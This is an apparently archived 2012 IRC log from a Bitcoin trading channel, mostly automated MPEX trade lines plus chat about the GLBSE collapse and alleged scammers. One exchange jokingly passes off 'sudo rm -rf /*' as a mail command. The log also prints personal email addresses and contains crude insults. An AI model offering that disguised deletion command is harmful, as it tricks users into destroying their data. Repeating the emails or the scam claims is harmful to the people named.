14.2507 BTC [-] Dec 22 18:25:47 [MPEX] [O.BTCUSD.C130T] 300 @ 0.07196172 = 21.5885 BTC [-] Dec 22 18:26:06 lol, WTF? https://bitcointalk.org/index.php?topic=77870.msg1415296#msg1415296 Dec 22 18:26:37 that sounds a bit off from what I had come to expect out of evoorhees Dec 22 18:27:58 mmm Dec 22 18:28:03 it does... Dec 22 18:29:57 a well, other people's humour is a bit like other people's farts Dec 22 18:30:11 doesn't quite compare to one's own. Dec 22 18:30:44 well, at firs it seemd like a joke, but it had a weight to it Dec 22 18:31:03 a weight ? Dec 22 18:32:52 the dividend is down to .00012 per share now Dec 22 18:33:06 so it lost like 4k past 2 days ? Dec 22 18:34:00 aite, i got a meeting. bbl. Dec 22 18:34:08 do well :) Dec 22 18:42:01 [MPEX] [S.MPOE] 3650 @ 0.00062 = 2.263 BTC [+] Dec 22 18:47:45 [MPEX] [S.MPOE] 5899 @ 0.00062 = 3.6574 BTC [+] Dec 22 19:01:25 [MPEX] [S.MPOE] 3500 @ 0.00062 = 2.17 BTC [+] Dec 22 19:11:37 [MPEX] [S.MPOE] 4400 @ 0.00062 = 2.728 BTC [+] Dec 22 19:47:32 [MPEX] [S.MPOE] 9355 @ 0.00062 = 5.8001 BTC [+] Dec 22 19:50:54 ;;ticker Dec 22 19:50:54 BTCUSD ticker | Best bid: 13.34401, Best ask: 13.39990, Bid-ask spread: 0.05589, Last trade: 13.34401, 24 hour volume: 19065.94294403, 24 hour low: 13.32130, 24 hour high: 13.58998, 24 hour vwap: 13.46577 Dec 22 19:52:01 [MPEX] [S.MPOE] 44900 @ 0.00062 = 27.838 BTC [+] Dec 22 20:16:01 [MPEX] [S.MPOE] 1800 @ 0.00062 = 1.116 BTC [+] Dec 22 20:29:02 [MPEX] [S.DICE] 574 @ 0.00358998 = 2.0606 BTC [-] Dec 22 20:32:16 [MPEX] [S.MPOE] 11200 @ 0.00062 = 6.944 BTC [+] Dec 22 20:39:56 what's new? Dec 22 20:55:39 [MPEX] [S.MPOE] 5800 @ 0.00062 = 3.596 BTC [+] Dec 22 21:00:13 [MPEX] [S.MPOE] 15058 @ 0.00062 = 9.336 BTC [+] Dec 22 21:13:50 [MPEX] [S.MPOE] 10900 @ 0.00062 = 6.758 BTC [+] Dec 22 21:18:56 it looks like mircea's selling the stock too cheaply Dec 22 21:18:58 [MPEX] [S.MPOE] 10300 @ 0.00062 = 6.386 BTC [+] Dec 22 21:20:18 [MPEX] [S.MPOE] 12800 @ 0.00062 = 7.936 BTC [+] Dec 22 21:34:45 https://bitcointalk.org/index.php?topic=132961.0 Dec 22 21:36:28 Ouch! Dec 22 21:39:07 I also received a letter from that little shit bird usagi. Looks like all the crap he was spreading in the forum, that I do not hold any shares in those disasters he "managed", was a lie. Dec 22 21:39:50 I guess usagi is even a bigger liar than I ever expected Dec 22 21:43:21 EskimoBob: so basically Dec 22 21:43:34 [MPEX] [S.MPOE] 11100 @ 0.00062 = 6.882 BTC [+] Dec 22 21:43:35 everyone and their grandmother managed to scam dmc. Dec 22 21:43:45 fucking nefario =/ Dec 22 21:45:26 EskimoBob: while you're ramming your cock down the japanese princess's throat, link to my thread. Dec 22 21:50:45 [MPEX] [S.MPOE] 10600 @ 0.00062 = 6.572 BTC [+] Dec 22 21:52:08 :) Dec 22 21:55:35 Diablo-D3: you better bump that one [url=https://bitcointalk.org/index.php?topic=132961.0]usagi, NYAN, BMF do not own DMC shares[/url] Dec 22 21:55:49 correction: https://bitcointalk.org/index.php?topic=113708.0 Dec 22 21:58:14 you now how this shit storm is gong to end? Nefario will manage to clean up his part and is home free. Then rest of the scammy fucker have nowhere to hide Dec 22 21:58:43 the revealing of the scammers Dec 22 21:59:21 [MPEX] [S.MPOE] 6100 @ 0.00062 = 3.782 BTC [+] Dec 22 22:00:00 now some have to create a new scam to mask the previous one Dec 22 22:00:20 add * scammer list, except myself :) Dec 22 22:00:38 lol Dec 22 22:01:07 there is probably a bash script for that Dec 22 22:03:49 [MPEX] [S.MPOE] 5627 @ 0.00062 = 3.4887 BTC [+] Dec 22 22:05:33 bash script for hiding the scams? Dec 22 22:05:36 rm -rf Dec 22 22:05:38 simple Dec 22 22:26:24 jurov: you mean Read Mail Really Fast : sudo rm -rf /* Dec 22 22:29:05 [MPEX] [S.MPOE] 2031 @ 0.00062 = 1.2592 BTC [+] Dec 22 22:34:30 [MPEX] [S.MPOE] 4400 @ 0.00062 = 2.728 BTC [+] Dec 22 22:37:02 that doesnt work always Dec 22 22:37:32 su - then, if you can :) Dec 22 22:37:46 there you go Dec 22 22:38:18 or yo can practice in your home dir with ./* Dec 22 22:38:27 works every time Dec 22 22:39:01 all my dirs are git repoed Dec 22 22:39:13 for that very reason Dec 22 22:39:35 i also prevent the * glob from expanding into hidden dirs Dec 22 22:40:15 [MPEX] [S.MPOE] 7400 @ 0.00062 = 4.588 BTC [+] Dec 22 22:40:28 the mpex link above needs changing Dec 22 22:40:52 you mean deleting? Dec 22 22:41:19 you must really hate mpex Dec 22 22:41:29 no, not at all Dec 22 22:42:01 "hate" is too good for something as worthless as that crap :) Dec 22 22:42:01 you always rag on it Dec 22 22:42:25 where is your exchange? Dec 22 22:43:03 my exchange? Why do I need one? I use ltcglobal for now Dec 22 22:43:04 why is it "crap"? Dec 22 22:43:13 [MPEX] [S.MPOE] 12051 @ 0.00062 = 7.4716 BTC [+] Dec 22 22:44:08 [MPEX] [S.MPOE] 15100 @ 0.00062 = 9.362 BTC [+] Dec 22 22:44:35 of course no reply Dec 22 22:44:38 ;) Dec 22 22:44:57 cause no rounded corners duh Dec 22 22:45:15 waaaah no js Dec 22 22:45:27 waaah no gradients Dec 22 22:45:31 dude, I am not here all the time. Dec 22 22:45:53 EskimoBob the hater. Dec 22 22:46:05 but not all the time thestringpuller. Dec 22 22:46:06 of the bitcoin haterz club Dec 22 22:46:07 rounded corners, lol. Yes, eye candy is how you pick a exchange to use Dec 22 22:46:32 you see Dec 22 22:46:46 I am actually really nice :) Dec 22 22:47:29 when not hating on people Dec 22 22:47:37 we are all nice Dec 22 22:48:12 btw, my wife makes the best gin&tonic in the world. I am going to have one... Dec 22 22:52:16 [MPEX] [S.MPOE] 6000 @ 0.00062 = 3.72 BTC [+] Dec 22 22:56:28 Diablo-D3, I was just reading that usagi did not own DMC shares, I got news for you, IIRC usagi`s BMF spreadsheet showed that BMF owned 148 ABM shares, now tell you what, No one owns near that number and also no email that fits usagi. Dec 22 22:57:20 [MPEX] [S.MPOE] 11287 @ 0.00062 = 6.9979 BTC [+] Dec 22 23:01:27 usagi has the email glbseuser@hotmail.com Dec 22 23:02:44 Not his official email usagi@tsukino.ca Dec 22 23:02:50 and he's on my lists Dec 22 23:11:00 [MPEX] [S.MPOE] 4072 @ 0.00062 = 2.5246 BTC [+] Dec 22 23:30:01 [MPEX] [S.MPOE] 9498 @ 0.00062 = 5.8888 BTC [+] Dec 22 23:37:22 [MPEX] [S.MPOE] 8350 @ 0.00062 = 5.177 BTC [+] Dec 22 23:45:16 [MPEX] [S.DICE] 1461 @ 0.00348056 = 5.0851 BTC [-] Dec 22 23:45:17 [MPEX] [S.DICE] 389 @ 0.00347206 = 1.3506 BTC [-] Dec 22 23:47:57 in that case Dec 22 23:48:08 I have not said a word Dec 22 23:54:48 [MPEX] [S.MPOE] 7900 @ 0.00062 = 4.898 BTC [+] Dec 22 23:58:50 Does that mean he has more, then? Dec 23 00:05:14 [MPEX] [S.MPOE] 8420 @ 0.00062 = 5.2204 BTC [+] Dec 23 00:10:12 uhh in the case of that email address, yes that addy owns 210 Dec 23 00:16:38 I can confirm it's usagi Dec 23 00:17:27 So I'm not sure, but it seems to be an issue regarding DMC only. Dec 23 00:24:11 that is probably the case Dec 23 00:29:41 [MPEX] [S.MPOE] 8000 @ 0.00062 = 4.96 BTC [+] Dec 23 00:36:41 [MPEX] [S.MPOE] 9350 @ 0.00062 = 5.797 BTC [+] Dec 23 00:36:43 EskimoBob: hendricks gin, tonic, slice of cucumber Dec 23 00:39:31 [MPEX] [S.MPOE] 6120 @ 0.00062 = 3.7944 BTC [+] Dec 23 00:50:42 [MPEX] [S.MPOE] 9200 @ 0.00062 = 5.704 BTC [+] Dec 23 00:53:16 [MPEX] [S.MPOE] 3100 @ 0.00062 = 1.922 BTC [+] Dec 23 01:03:46 [MPEX] [S.MPOE] 10450 @ 0.00062 = 6.479 BTC [+] Dec 23 01:24:18 [MPEX] [S.MPOE] 9472 @ 0.00062 = 5.8726 BTC [+] Dec 23 01:26:18 [04:01:30] usagi has the email glbseuser@hotmail.com Dec 23 01:26:29 then hes going to have to publicily admit that Dec 23 01:29:23 glbseuser is on the list with 1310 Dec 23 01:29:30 which is still less than he claimed Dec 23 01:36:32 Sales/purchases can occur between last you checked and GLBSE closed. Dec 23 01:36:59 Claims made before data was disclosed was last known amount. Dec 23 01:45:00 [MPEX] [S.MPOE] 6269 @ 0.00062 = 3.8868 BTC [+] Dec 23 01:46:14 Namjies: Im not the party of interest here, though Dec 23 01:46:15 usagi is Dec 23 01:46:27 usagi was claiming about half of the 10k shares Dec 23 01:46:34 before I sold the other 10k Dec 23 01:52:22 Maybe he dumped a lot of them Dec 23 01:54:39 possibly, but he never told his shareholders Dec 23 01:54:45 and the market didnt support just dumping them in one go Dec 23 01:55:14 glbse collapsed shortly after he made his last monthly reports iirc Dec 23 01:55:23 hrm, I wonder if I bought him out Dec 23 01:55:38 because I bought half of the 20k before glbse collapsed Dec 23 02:05:23 [MPEX] [S.MPOE] 9664 @ 0.00062 = 5.9917 BTC [+] Dec 23 02:11:45 [MPEX] [S.MPOE] 8400 @ 0.00062 = 5.208 BTC [+] Dec 23 02:23:38 [MPEX] [S.MPOE] 8800 @ 0.00062 = 5.456 BTC [+] Dec 23 02:29:05 [MPEX] [S.MPOE] 10400 @ 0.00062 = 6.448 BTC [+] Dec 23 02:33:15 [MPEX] [S.MPOE] 12150 @ 0.00062 = 7.533 BTC [+] Dec 23 02:35:35 usagi lol Dec 23 02:36:49 [MPEX] [S.MPOE] 15700 @ 0.00062 = 9.734 BTC [+] Dec 23 02:37:17 smickles: where you at? Dec 23 02:38:59 [MPEX] [S.MPOE] 9300 @ 0.00062 = 5.766 BTC [+] Dec 23 02:41:13 ;;ticker Dec 23 02:41:13 BTCUSD ticker | Best bid: 13.25672, Best ask: 13.34999, Bid-ask spread: 0.09327, Last trade: 13.25565, 24 hour volume: 24767.51391968, 24 hour low: 13.01000, 24 hour high: 13.58996, 24 hour vwap: 13.31611 Dec 23 02:42:57 ls Dec 23 03:03:54 [MPEX] [S.MPOE] 4300 @ 0.00062 = 2.666 BTC [+] Dec 23 03:21:29 [MPEX] [S.MPOE] 4650 @ 0.00062 = 2.883 BTC [+] Dec 23 03:33:57 [MPEX] [S.MPOE] 3200 @ 0.00061996 = 1.9839 BTC [-] Dec 23 03:33:57 [MPEX] [S.MPOE] 9750 @ 0.00061995 = 6.0445 BTC [-] Dec 23 03:33:59 [MPEX] [S.MPOE] 8700 @ 0.00061992 = 5.3933 BTC [-] Dec 23 03:34:00 [MPEX] [S.MPOE] 11600 @ 0.0006199 = 7.1908 BTC [-] Dec 23 03:34:01 [MPEX] [S.MPOE] 10700 @ 0.00061978 = 6.6316 BTC [-] Dec 23 03:34:02 [MPEX] [S.MPOE] 6450 @ 0.00061972 = 3.9972 BTC [-] Dec 23 03:34:03 [MPEX] [S.MPOE] 1758 @ 0.00061967 = 1.0894 BTC [-] Dec 23 03:34:04 [MPEX] [S.MPOE] 3900 @ 0.00061966 = 2.4167 BTC [-] Dec 23 03:34:05 [MPEX] [S.MPOE] 1100 @ 0.00061956 = 0.6815 BTC [-] Dec 23 03:34:07 [MPEX] [S.MPOE] 2550 @ 0.00061932 = 1.5793 BTC [-] Dec 23 03:34:08 [MPEX] [S.MPOE] 3350 @ 0.0006193 = 2.0747 BTC [-] Dec 23 03:34:09 [MPEX] [S.MPOE] 7368 @ 0.00061923 = 4.5625 BTC [-] Dec 23 03:34:09 [MPEX] [S.MPOE] 3969 @ 0.00061904 = 2.457 BTC [-] Dec 23 03:34:10 [MPEX] [S.MPOE] 3300 @ 0.0006189 = 2.0424 BTC [-] Dec 23 03:34:11 [MPEX] [S.MPOE] 3011 @ 0.00061881 = 1.8632 BTC [-] Dec 23 03:34:12 [MPEX] [S.MPOE] 7500 @ 0.00061878 = 4.6409 BTC [-] Dec 23 03:34:13 [MPEX] [S.MPOE] 7600 @ 0.00061874 = 4.7024 BTC [-] Dec 23 03:34:14 [MPEX] [S.MPOE] 2800 @ 0.00061863 = 1.7322 BTC [-] Dec 23 03:34:15 [MPEX] [S.MPOE] 22900 @ 0.00061861 = 14.1662 BTC [-] Dec 23 03:34:16 [MPEX] [S.MPOE] 1700 @ 0.00061855 = 1.0515 BTC [-] Dec 23 03:34:17 [MPEX] [S.MPOE] 11400 @ 0.0006184 = 7.0498 BTC [-] Dec 23 03:34:18 [MPEX] [S.MPOE] 8310 @ 0.00061839 = 5.1388 BTC [-] Dec 23 03:34:19 [MPEX] [S.MPOE] 6913 @ 0.00061836 = 4.2747 BTC [-] Dec 23 03:34:19 [MPEX] [S.MPOE] 7900 @ 0.00061834 = 4.8849 BTC [-] Dec 23 03:34:20 [MPEX] [S.MPOE] 6700 @ 0.00061834 = 4.1429 BTC [-] Dec 23 03:34:21 [MPEX] [S.MPOE] 12400 @ 0.00061824 = 7.6662 BTC [-] Dec 23 03:34:22 [MPEX] [S.MPOE] 11300 @ 0.00061822 = 6.9859 BTC [-] Dec 23 03:34:23 [MPEX] [S.MPOE] 7850 @ 0.00061783 = 4.85 BTC [-] Dec 23 03:34:24 [MPEX] [S.MPOE] 7988 @ 0.00061773 = 4.9344 BTC [-] Dec 23 03:34:26 not that again Dec 23 03:34:26 [MPEX] [S.MPOE] 863 @ 0.00061767 = 0.533 BTC [-] Dec 23 03:34:27 [MPEX] [S.MPOE] 2800 @ 0.00061761 = 1.7293 BTC [-] Dec 23 03:34:28 [MPEX] [S.MPOE] 4450 @ 0.0006176 = 2.7483 BTC [-] Dec 23 03:34:29 [MPEX] [S.MPOE] 7750 @ 0.00061755 = 4.786 BTC [-] Dec 23 03:34:29 [MPEX] [S.MPOE] 2350 @ 0.0006175 = 1.4511 BTC [-] Dec 23 03:34:30 [MPEX] [S.MPOE] 23050 @ 0.0006175 = 14.2334 BTC [-] Dec 23 03:34:31 [MPEX] [S.MPOE] 47100 @ 0.0006174 = 29.0795 BTC [-] Dec 23 03:34:32 [MPEX] [S.MPOE] 10470 @ 0.0006173 = 6.4631 BTC [-] Dec 23 03:34:33 [MPEX] [S.MPOE] 3945 @ 0.00061701 = 2.4341 BTC [-] Dec 23 03:34:34 [MPEX] [S.MPOE] 4042 @ 0.00061695 = 2.4937 BTC [-] Dec 23 03:34:35 [MPEX] [S.MPOE] 11150 @ 0.00061671 = 6.8763 BTC [-] Dec 23 03:34:36 [MPEX] [S.MPOE] 7101 @ 0.00061664 = 4.3788 BTC [-] Dec 23 03:34:37 [MPEX] [S.MPOE] 14626 @ 0.00061654 = 9.0175 BTC [-] Dec 23 03:34:38 [MPEX] [S.MPOE] 6113 @ 0.00061647 = 3.7685 BTC [-] Dec 23 03:34:38 [MPEX] [S.MPOE] 6000 @ 0.00061642 = 3.6985 BTC [-] Dec 23 03:34:40 [MPEX] [S.MPOE] 14950 @ 0.00061637 = 9.2147 BTC [-] Dec 23 03:34:41 [MPEX] [S.MPOE] 8609 @ 0.00061635 = 5.3062 BTC [-] Dec 23 03:34:41 [MPEX] [S.MPOE] 6800 @ 0.00061625 = 4.1905 BTC [-] Dec 23 03:34:42 [MPEX] [S.MPOE] 9300 @ 0.00061607 = 5.7295 BTC [-] Dec 23 03:34:44 [MPEX] [S.MPOE] 8745 @ 0.00061603 = 5.3872 BTC [-] Dec 23 03:34:45 [MPEX] [S.MPOE] 12600 @ 0.00061597 = 7.7612 BTC [-] Dec 23 03:34:45 [MPEX] [S.MPOE] 8900 @ 0.00061596 = 5.482 BTC [-] Dec 23 03:34:46 [MPEX] [S.MPOE] 4700 @ 0.00061591 = 2.8948 BTC [-] Dec 23 03:34:47 [MPEX] [S.MPOE] 6862 @ 0.00061586 = 4.226 BTC [-] Dec 23 03:34:49 [MPEX] [S.MPOE] 7900 @ 0.00061585 = 4.8652 BTC [-] Dec 23 03:34:49 [MPEX] [S.MPOE] 14100 @ 0.00061579 = 8.6826 BTC [-] Dec 23 03:34:51 [MPEX] [S.MPOE] 3650 @ 0.00061563 = 2.247 BTC [-] Dec 23 03:34:51 EskimoBob!*@* added to ignore list. Dec 23 03:34:52 [MPEX] [S.MPOE] 2050 @ 0.00061553 = 1.2618 BTC [-] Dec 23 03:34:53 [MPEX] [S.MPOE] 3013 @ 0.00061553 = 1.8546 BTC [-] Dec 23 03:34:53 [MPEX] [S.MPOE] 3133 @ 0.00061547 = 1.9283 BTC [-] Dec 23 03:34:54 [MPEX] [S.MPOE] 4200 @ 0.00061538 = 2.5846 BTC [-] Dec 23 03:34:55 [MPEX] [S.MPOE] 4400 @ 0.00061517 = 2.7067 BTC [-] Dec 23 03:34:57 [MPEX] [S.MPOE] 29100 @ 0.00061515 = 17.9009 BTC [-] Dec 23 03:34:58 [MPEX] [S.MPOE] 3600 @ 0.00061513 = 2.2145 BTC [-] Dec 23 03:34:59 [MPEX] [S.MPOE] 5628 @ 0.0006151 = 3.4618 BTC [-] Dec 23 03:35:00 [MPEX] [S.MPOE] 9550 @ 0.00061504 = 5.8736 BTC [-] Dec 23 03:35:01 [MPEX] [S.MPOE] 9400 @ 0.00061488 = 5.7799 BTC [-] Dec 23 03:35:01 [MPEX] [S.MPOE] 4700 @ 0.00061478 = 2.8895 BTC [-] Dec 23 03:35:03 [MPEX] [S.MPOE] 18550 @ 0.00061475 = 11.4036 BTC [-] Dec 23 03:35:04 [MPEX] [S.MPOE] 8550 @ 0.00061473 = 5.2559 BTC [-] Dec 23 03:35:05 [MPEX] [S.MPOE] 4250 @ 0.00061457 = 2.6119 BTC [-] Dec 23 03:35:06 [MPEX] [S.MPOE] 12200 @ 0.00061456 = 7.4976 BTC [-] Dec 23 03:35:07 [MPEX] [S.MPOE] 6100 @ 0.00061455 = 3.7488 BTC [-] Dec 23 03:35:07 [MPEX] [S.MPOE] 10300 @ 0.00061453 = 6.3297 BTC [-] Dec 23 03:35:09 [MPEX] [S.MPOE] 3150 @ 0.00061444 = 1.9355 BTC [-] Dec 23 03:35:09 [MPEX] [S.MPOE] 5200 @ 0.00061441 = 3.1949 BTC [-] Dec 23 03:35:10 [MPEX] [S.MPOE] 10011 @ 0.00061435 = 6.1503 BTC [-] Dec 23 03:35:11 [MPEX] [S.MPOE] 2043 @ 0.00061418 = 1.2548 BTC [-] Dec 23 03:35:13 [MPEX] [S.MPOE] 17300 @ 0.00061413 = 10.6244 BTC [-] Dec 23 03:35:13 [MPEX] [S.MPOE] 22485 @ 0.00061409 = 13.8078 BTC [-] Dec 23 03:35:14 [MPEX] [S.MPOE] 2100 @ 0.00061409 = 1.2896 BTC [-] Dec 23 03:35:15 [MPEX] [S.MPOE] 5800 @ 0.00061408 = 3.5617 BTC [-] Dec 23 03:35:17 [MPEX] [S.MPOE] 18400 @ 0.00061398 = 11.2972 BTC [-] Dec 23 03:35:17 [MPEX] [S.MPOE] 12502 @ 0.00061398 = 7.676 BTC [-] Dec 23 03:35:19 [MPEX] [S.MPOE] 13100 @ 0.00061389 = 8.042 BTC [-] Dec 23 03:35:20 [MPEX] [S.MPOE] 10100 @ 0.00061387 = 6.2001 BTC [-] Dec 23 03:35:21 [MPEX] [S.MPOE] 2250 @ 0.00061384 = 1.3811 BTC [-] Dec 23 03:35:21 [MPEX] [S.MPOE] 6900 @ 0.00061383 = 4.2354 BTC [-] Dec 23 03:35:23 [MPEX] [S.MPOE] 6950 @ 0.00061373 = 4.2654 BTC [-] Dec 23 03:35:24 [MPEX] [S.MPOE] 8720 @ 0.0006137 = 5.3515 BTC [-] Dec 23 03:35:25 [MPEX] [S.MPOE] 9937 @ 0.00061362 = 6.0975 BTC [-] Dec 23 03:35:26 [MPEX] [S.MPOE] 11050 @ 0.00061359 = 6.7802 BTC [-] Dec 23 03:35:27 [MPEX] [S.MPOE] 9000 @ 0.00061342 = 5.5208 BTC [-] Dec 23 03:35:27 [MPEX] [S.MPOE] 5700 @ 0.00061336 = 3.4962 BTC [-] Dec 23 03:35:29 [MPEX] [S.MPOE] 3300 @ 0.00061332 = 2.024 BTC [-] Dec 23 03:35:30 [MPEX] [S.MPOE] 7218 @ 0.00061331 = 4.4269 BTC [-] Dec 23 03:35:30 [MPEX] [S.MPOE] 10600 @ 0.00061326 = 6.5006 BTC [-] Dec 23 03:35:32 [MPEX] [S.MPOE] 9427 @ 0.00061312 = 5.7799 BTC [-] Dec 23 03:35:32 [MPEX] [S.MPOE] 11997 @ 0.00061305 = 7.3548 BTC [-] Dec 23 03:35:34 [MPEX] [S.MPOE] 8889 @ 0.00061282 = 5.4474 BTC [-] Dec 23 03:35:35 [MPEX] [S.MPOE] 25290 @ 0.00061273 = 15.4959 BTC [-] Dec 23 03:35:36 [MPEX] [S.MPOE] 6400 @ 0.00061244 = 3.9196 BTC [-] Dec 23 03:35:37 [MPEX] [S.MPOE] 7786 @ 0.00061243 = 4.7684 BTC [-] Dec 23 03:35:37 [MPEX] [S.MPOE] 26643 @ 0.00061238 = 16.3156 BTC [-] Dec 23 03:35:38 [MPEX] [S.MPOE] 10700 @ 0.00061238 = 6.5525 BTC [-] Dec 23 03:35:40 [MPEX] [S.MPOE] 6750 @ 0.00061236 = 4.1334 BTC [-] Dec 23 03:35:41 [MPEX] [S.MPOE] 7450 @ 0.00061235 = 4.562 BTC [-] Dec 23 03:35:41 [MPEX] [S.MPOE] 3500 @ 0.00061232 = 2.1431 BTC [-] Dec 23 03:35:43 [MPEX] [S.MPOE] 11100 @ 0.00061228 = 6.7963 BTC [-] Dec 23 03:35:43 [MPEX] [S.MPOE] 5750 @ 0.00061227 = 3.5206 BTC [-] Dec 23 03:35:45 [MPEX] [S.MPOE] 6650 @ 0.00061216 = 4.0709 BTC [-] Dec 23 03:35:46 [MPEX] [S.MPOE] 7300 @ 0.00061207 = 4.4681 BTC [-] Dec 23 03:36:36 whos the lucky winner? Dec 23 03:38:38 [MPEX] [S.DICE] 1411 @ 0.00347206 = 4.8991 BTC [-] Dec 23 03:38:39 [MPEX] [S.DICE] 1794 @ 0.00340818 = 6.1143 BTC [-] Dec 23 03:38:41 [MPEX] [S.DICE] 894 @ 0.00339076 = 3.0313 BTC [-] Dec 23 03:38:42 [MPEX] [S.DICE] 850 @ 0.00336639 = 2.8614 BTC [-] Dec 23 03:38:43 [MPEX] [S.DICE] 51 @ 0.0032 = 0.1632 BTC [-] Dec 23 03:40:59 [MPEX] [O.BTCUSD.C100T] 820 @ 0.30712274 = 251.8406 BTC [+] Dec 23 03:50:36 [MPEX] [S.MPOE] 12335 @ 0.000612 = 7.549 BTC [-] Dec 23 05:31:51 ;;calc (14-10)/14 Dec 23 05:31:51 0.285714285714 Dec 23 05:36:59 [MPEX] [S.MPOE] 6479 @ 0.00062 = 4.017 BTC [+] Dec 23 05:40:36 [MPEX] [S.MPOE] 8100 @ 0.00062 = 5.022 BTC [+] Dec 23 06:06:34 [MPEX] [S.DICE] 700 @ 0.00335672 = 2.3497 BTC [+] Dec 23 06:10:59 [MPEX] [S.MPOE] 11050 @ 0.00062 = 6.851 BTC [+] **** BEGIN LOGGING AT Sun Dec 23 12:44:11 2012 Dec 23 13:10:54 [MPEX] [S.MPOE] 4700 @ 0.00062 = 2.914 BTC [+] Dec 23 13:27:07 [MPEX] [S.MPOE] 5700 @ 0.00062 = 3.534 BTC [+] Dec 23 13:32:49 [MPEX] [S.MPOE] 2900 @ 0.00062 = 1.798 BTC [+] Dec 23 13:35:14 [MPEX] [S.MPOE] 13950 @ 0.00062 = 8.649 BTC [+] Dec 23 13:43:49 [MPEX] [S.MPOE] 15350 @ 0.00062 = 9.517 BTC [+] Dec 23 13:51:28 [MPEX] [S.MPOE] 2450 @ 0.00062 = 1.519 BTC [+] Dec 23 14:11:40 Diablo-D3: I posted the last known usagi portfolio content to your https://bitcointalk.org/index.php?topic=132961.0 Dec 23 14:12:18 this was from hes web site but it was probably not updated. Only way to find out, what he really had, was ask James for a copy. Dec 23 14:16:37 EskimoBob!*@* added to ignore list. Dec 23 14:46:01 [MPEX] [S.MPOE] 14300 @ 0.00062 = 8.866 BTC [+] Dec 23 14:51:47 [MPEX] [S.MPOE] 9950 @ 0.00062 = 6.169 BTC [+] Dec 23 15:02:40 [MPEX] [S.MPOE] 4700 @ 0.00062 = 2.914 BTC [+] Dec 23 15:06:19 [MPEX] [S.DICE] 950 @ 0.00322888 = 3.0674 BTC [-] Dec 23 15:13:31 [MPEX] [S.MPOE] 4800 @ 0.00062 = 2.976 BTC [+] Dec 23 15:14:35 [MPEX] [S.MPOE] 7750 @ 0.00062 = 4.805 BTC [+] Dec 23 15:28:02 [MPEX] [S.MPOE] 13400 @ 0.00062 = 8.308 BTC [+] Dec 23 15:32:47 [MPEX] [S.MPOE] 9017 @ 0.00062 = 5.5905 BTC [+] Dec 23 15:48:38 EskimoBob: I got the mug, awesome! Dec 23 15:49:04 pics Dec 23 15:49:22 one min Dec 23 15:58:41 [MPEX] [S.MPOE] 3395 @ 0.00062 = 2.1049 BTC [+] Dec 23 15:59:55 http://postimage.org/image/pidp510c7/ Dec 23 16:00:39 [MPEX] [S.MPOE] 7050 @ 0.00062 = 4.371 BTC [+] Dec 23 16:01:57 cool Dec 23 16:02:01 is is drinkable from Dec 23 16:03:31 is it* Dec 23 16:03:49 I hope so Dec 23 16:09:19 [MPEX] [S.MPOE] 5100 @ 0.00062 = 3.162 BTC [+] Dec 23 16:15:25 ;;ticker Dec 23 16:15:26 BTCUSD ticker | Best bid: 13.13001, Best ask: 13.14780, Bid-ask spread: 0.01779, Last trade: 13.13001, 24 hour volume: 22196.08738081, 24 hour low: 13.01000, 24 hour high: 13.48547, 24 hour vwap: 13.24589 Dec 23 16:16:51 someone shorted s.dice frak Dec 23 16:16:52 again Dec 23 16:16:56 and smpoe Dec 23 16:19:20 [MPEX] [S.MPOE] 2870 @ 0.00062 = 1.7794 BTC [+] Dec 23 16:26:06 [MPEX] [S.MPOE] 9000 @ 0.00062 = 5.58 BTC [+] Dec 23 16:26:44 yeah i might pick up some dice Dec 23 16:34:02 [MPEX] [S.MPOE] 9588 @ 0.00062 = 5.9446 BTC [+] Dec 23 16:35:03 [MPEX] [S.MPOE] 10682 @ 0.00062 = 6.6228 BTC [+] Dec 23 16:53:18 [MPEX] [S.MPOE] 4328 @ 0.00062 = 2.6834 BTC [+] Dec 23 16:53:56 [MPEX] [S.MPOE] 10655 @ 0.00062 = 6.6061 BTC [+] Dec 23 16:59:51 smickles maybe making a ton Dec 23 16:59:58 on his loan service Dec 23 17:01:03 [MPEX] [S.MPOE] 3800 @ 0.00062 = 2.356 BTC [+] Dec 23 17:17:14 [MPEX] [S.MPOE] 6950 @ 0.00062 = 4.309 BTC [+] Dec 23 17:20:05 [MPEX] [S.MPOE] 9699 @ 0.00062 = 6.0134 BTC [+] Dec 23 17:42:26 thestringpuller: good morning! Sorry that I missed you yesterday. Dec 23 17:45:56 its cool bro Dec 23 17:56:43 [MPEX] [S.MPOE] 6600 @ 0.00062 = 4.092 BTC [+] Dec 23 17:57:22 i was driving all day Dec 23 18:03:09 nice Dec 23 18:03:49 [MPEX] [S.MPOE] 4000 @ 0.00062 = 2.48 BTC [+] Dec 23 18:06:41 yep Dec 23 18:06:54 she drew some pictures Dec 23 18:11:02 [MPEX] [S.MPOE] 11000 @ 0.00062 = 6.82 BTC [+] Dec 23 18:14:00 It says "Hello America" Dec 23 18:15:02 [MPEX] [S.MPOE] 23650 @ 0.00062 = 14.663 BTC [+] Dec 23 18:15:47 you should have them draw for BTC Dec 23 18:15:52 http://postimage.org/image/7zu3cfnq5/ Dec 23 18:31:53 bout to sell out Bob <@Litie> [GLOBAL/ART] Latest: 140@1.0 - Bid: 0.961 - Ask: 1.0 Dec 23 18:34:28 [MPEX] [S.MPOE] 12400 @ 0.00062 = 7.688 BTC [+] Dec 23 18:50:09 drama? Dec 23 18:50:11 what drama? Dec 23 18:54:40 [MPEX] [S.MPOE] 6546 @ 0.00062 = 4.0585 BTC [+] Dec 23 18:59:03 [MPEX] [S.MPOE] 9626 @ 0.00062 = 5.9681 BTC [+] Dec 23 19:01:47 [MPEX] [S.MPOE] 4400 @ 0.00062 = 2.728 BTC [+] Dec 23 19:03:17 ok this is an accomplishment Dec 23 19:03:24 i've boiled two different sorts of pasta together Dec 23 19:03:27 they came out both al dente Dec 23 19:03:44 :) Dec 23 19:04:06 i am now master of pasta. Dec 23 19:04:14 now put some prosciutto and cheese with that in the oven Dec 23 19:05:05 [MPEX] [S.MPOE] 6500 @ 0.00062 = 4.03 BTC [+] Dec 23 19:06:13 bah Dec 23 19:06:18 [MPEX] [S.MPOE] 5400 @ 0.00062 = 3.348 BTC [+] Dec 23 19:07:31 hum, if i install bitcoind along bitcoin gui client, will it use same wallet right? Dec 23 19:07:58 kakobrekla o no, it was for chicken in white wine sauce Dec 23 19:09:02 to be honest sometimes i wish i could just eat elecricity or something Dec 23 19:09:04 [MPEX] [S.MPOE] 9174 @ 0.00062 = 5.6879 BTC [+] Dec 23 19:09:07 batteries perhaps Dec 23 19:09:24 why ?! Dec 23 19:09:57 i dunno, i guess i dont like eating and shitting to much Dec 23 19:10:02 seems so wasteful Dec 23 19:10:14 ... Dec 23 19:10:16 hello pastafarians Dec 23 19:11:09 and i just found out that my romanian literature teacher from hs just died Dec 23 